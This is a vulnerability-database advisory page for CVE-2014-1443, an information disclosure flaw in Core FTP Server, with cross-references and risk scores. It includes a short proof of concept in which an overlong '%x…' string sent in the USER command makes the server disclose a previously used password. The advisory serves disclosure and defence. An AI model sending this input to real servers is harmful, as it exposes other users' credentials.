Vulners
Lucene search
Core FTP 'USER' 命令信息泄露漏洞
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | Core FTP Server < 1.2 Build 515 Multiple Vulnerabilities | 24 Feb 201400:00 | – | nessus |
 | CVE-2014-1443 | 2 May 201401:00 | – | cve |
 | CVE-2014-1443 | 2 May 201401:00 | – | cvelist |
 | EUVD-2014-1519 | 7 Oct 202500:30 | – | euvd |
 | CVE-2014-1443 | 2 May 201401:59 | – | nvd |
 | Core FTP Server 1.2 DoS / Traversal / Disclosure | 5 Feb 201400:00 | – | packetstorm |
 | Design/Logic Flaw | 2 May 201401:59 | – | prion |
Proof of Concept:
1) Log into the Core FTP Server with a valid user.
2) Close the terminal.
3) Use the "USER" command with the following string:
"%xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
4) Observe that the previously used password is disclosed
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.00337